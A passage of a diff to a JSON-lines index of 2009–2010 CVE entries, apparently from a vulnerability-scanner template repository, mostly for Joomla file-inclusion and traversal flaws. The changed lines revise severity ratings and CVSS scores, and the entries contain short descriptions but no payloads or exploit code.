local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2009/CVE-2009-1558.yaml"} {"ID":"CVE-2009-1872","Info":{"Name":"Adobe Coldfusion \u003c=8.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2009/CVE-2009-1872.yaml"} -{"ID":"CVE-2009-2015","Info":{"Name":"Joomla! MooFAQ 1.0 - Local File Inclusion","Severity":"high","Description":"Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-2015.yaml"} -{"ID":"CVE-2009-2100","Info":{"Name":"Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion","Severity":"high","Description":"Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-2100.yaml"} -{"ID":"CVE-2009-3053","Info":{"Name":"Joomla! Agora 3.0.0b - Local File Inclusion","Severity":"high","Description":"Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-3053.yaml"} +{"ID":"CVE-2009-2015","Info":{"Name":"Joomla! MooFAQ 1.0 - Local File Inclusion","Severity":"high","Description":"Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-2015.yaml"} +{"ID":"CVE-2009-2100","Info":{"Name":"Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion","Severity":"medium","Description":"Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2009/CVE-2009-2100.yaml"} +{"ID":"CVE-2009-3053","Info":{"Name":"Joomla! Agora 3.0.0b - Local File Inclusion","Severity":"medium","Description":"Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2009/CVE-2009-3053.yaml"} {"ID":"CVE-2009-3318","Info":{"Name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","Severity":"high","Description":"Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-3318.yaml"} {"ID":"CVE-2009-4202","Info":{"Name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","Severity":"high","Description":"Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-4202.yaml"} {"ID":"CVE-2009-4223","Info":{"Name":"KR-Web \u003c=1.1b2 - Remote File Inclusion","Severity":"high","Description":"KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-4223.yaml"} {"ID":"CVE-2009-4679","Info":{"Name":"Joomla! Portfolio Nexus - Remote File Inclusion","Severity":"high","Description":"Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2009/CVE-2009-4679.yaml"} -{"ID":"CVE-2009-5020","Info":{"Name":"AWStats \u003c 6.95 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability in awredir.pl in AWStats \u003c 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2009/CVE-2009-5020.yaml"} -{"ID":"CVE-2009-5114","Info":{"Name":"WebGlimpse 2.18.7 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2009/CVE-2009-5114.yaml"} +{"ID":"CVE-2009-5020","Info":{"Name":"AWStats \u003c 6.95 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability in awredir.pl in AWStats \u003c 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2009/CVE-2009-5020.yaml"} +{"ID":"CVE-2009-5114","Info":{"Name":"WebGlimpse 2.18.7 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2009/CVE-2009-5114.yaml"} {"ID":"CVE-2010-0157","Info":{"Name":"Joomla! Component com_biblestudy - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-0157.yaml"} -{"ID":"CVE-2010-0219","Info":{"Name":"Apache Axis2 Default Login","Severity":"high","Description":"Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2010/CVE-2010-0219.yaml"} +{"ID":"CVE-2010-0219","Info":{"Name":"Apache Axis2 Default Login","Severity":"critical","Description":"Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2010/CVE-2010-0219.yaml"} {"ID":"CVE-2010-0467","Info":{"Name":"Joomla! Component CCNewsLetter - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2010/CVE-2010-0467.yaml"} -{"ID":"CVE-2010-0696","Info":{"Name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0696.yaml"} +{"ID":"CVE-2010-0696","Info":{"Name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","Severity":"medium","Description":"A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0696.yaml"} {"ID":"CVE-2010-0759","Info":{"Name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-0759.yaml"} -{"ID":"CVE-2010-0942","Info":{"Name":"Joomla! Component com_jvideodirect - Directory Traversal","Severity":"high","Description":"Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0942.yaml"} -{"ID":"CVE-2010-0943","Info":{"Name":"Joomla! Component com_jashowcase - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0943.yaml"} -{"ID":"CVE-2010-0944","Info":{"Name":"Joomla! Component com_jcollection - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0944.yaml"} +{"ID":"CVE-2010-0942","Info":{"Name":"Joomla! Component com_jvideodirect - Directory Traversal","Severity":"medium","Description":"Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0942.yaml"} +{"ID":"CVE-2010-0943","Info":{"Name":"Joomla! Component com_jashowcase - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0943.yaml"} +{"ID":"CVE-2010-0944","Info":{"Name":"Joomla! Component com_jcollection - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-0944.yaml"} {"ID":"CVE-2010-0972","Info":{"Name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-0972.yaml"} -{"ID":"CVE-2010-0982","Info":{"Name":"Joomla! Component com_cartweberp - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-0982.yaml"} +{"ID":"CVE-2010-0982","Info":{"Name":"Joomla! Component com_cartweberp - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-0982.yaml"} {"ID":"CVE-2010-0985","Info":{"Name":"Joomla! Component com_abbrev - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-0985.yaml"} -{"ID":"CVE-2010-1056","Info":{"Name":"Joomla! Component com_rokdownloads - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1056.yaml"} -{"ID":"CVE-2010-1081","Info":{"Name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1081.yaml"} -{"ID":"CVE-2010-1217","Info":{"Name":"Joomla! Component \u0026 Plugin JE Tooltip 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1217.yaml"} -{"ID":"CVE-2010-1219","Info":{"Name":"Joomla! Component com_janews - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1219.yaml"} -{"ID":"CVE-2010-1302","Info":{"Name":"Joomla! Component DW Graph - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1302.yaml"} -{"ID":"CVE-2010-1304","Info":{"Name":"Joomla! Component User Status - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1304.yaml"} -{"ID":"CVE-2010-1305","Info":{"Name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1305.yaml"} +{"ID":"CVE-2010-1056","Info":{"Name":"Joomla! Component com_rokdownloads - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1056.yaml"} +{"ID":"CVE-2010-1081","Info":{"Name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1081.yaml"} +{"ID":"CVE-2010-1217","Info":{"Name":"Joomla! Component \u0026 Plugin JE Tooltip 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1217.yaml"} +{"ID":"CVE-2010-1219","Info":{"Name":"Joomla! Component com_janews - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1219.yaml"} +{"ID":"CVE-2010-1302","Info":{"Name":"Joomla! Component DW Graph - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1302.yaml"} +{"ID":"CVE-2010-1304","Info":{"Name":"Joomla! Component User Status - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1304.yaml"} +{"ID":"CVE-2010-1305","Info":{"Name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1305.yaml"} {"ID":"CVE-2010-1306","Info":{"Name":"Joomla! Component Picasa 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1306.yaml"} -{"ID":"CVE-2010-1307","Info":{"Name":"Joomla! Component Magic Updater - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1307.yaml"} -{"ID":"CVE-2010-1308","Info":{"Name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1308.yaml"} -{"ID":"CVE-2010-1312","Info":{"Name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1312.yaml"} -{"ID":"CVE-2010-1313","Info":{"Name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1313.yaml"} -{"ID":"CVE-2010-1314","Info":{"Name":"Joomla! Component Highslide 1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1314.yaml"} -{"ID":"CVE-2010-1315","Info":{"Name":"Joomla! Component webERPcustomer - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1315.yaml"} -{"ID":"CVE-2010-1340","Info":{"Name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1340.yaml"} -{"ID":"CVE-2010-1345","Info":{"Name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1345.yaml"} -{"ID":"CVE-2010-1352","Info":{"Name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1352.yaml"} -{"ID":"CVE-2010-1353","Info":{"Name":"Joomla! Component LoginBox - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1353.yaml"} -{"ID":"CVE-2010-1354","Info":{"Name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1354.yaml"} -{"ID":"CVE-2010-1429","Info":{"Name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","Severity":"medium","Description":"Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about \"deployed web contexts\" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2010/CVE-2010-1429.yaml"} -{"ID":"CVE-2010-1461","Info":{"Name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2010/CVE-2010-1461.yaml"} -{"ID":"CVE-2010-1469","Info":{"Name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1469.yaml"} +{"ID":"CVE-2010-1307","Info":{"Name":"Joomla! Component Magic Updater - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1307.yaml"} +{"ID":"CVE-2010-1308","Info":{"Name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1308.yaml"} +{"ID":"CVE-2010-1312","Info":{"Name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1312.yaml"} +{"ID":"CVE-2010-1313","Info":{"Name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1313.yaml"} +{"ID":"CVE-2010-1314","Info":{"Name":"Joomla! Component Highslide 1.5 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1314.yaml"} +{"ID":"CVE-2010-1315","Info":{"Name":"Joomla! Component webERPcustomer - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1315.yaml"} +{"ID":"CVE-2010-1340","Info":{"Name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1340.yaml"} +{"ID":"CVE-2010-1345","Info":{"Name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1345.yaml"} +{"ID":"CVE-2010-1352","Info":{"Name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1352.yaml"} +{"ID":"CVE-2010-1353","Info":{"Name":"Joomla! Component LoginBox - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1353.yaml"} +{"ID":"CVE-2010-1354","Info":{"Name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1354.yaml"} +{"ID":"CVE-2010-1429","Info":{"Name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","Severity":"medium","Description":"Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about \"deployed web contexts\" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1429.yaml"} +{"ID":"CVE-2010-1461","Info":{"Name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1461.yaml"} +{"ID":"CVE-2010-1469","Info":{"Name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Ternaria Informatica 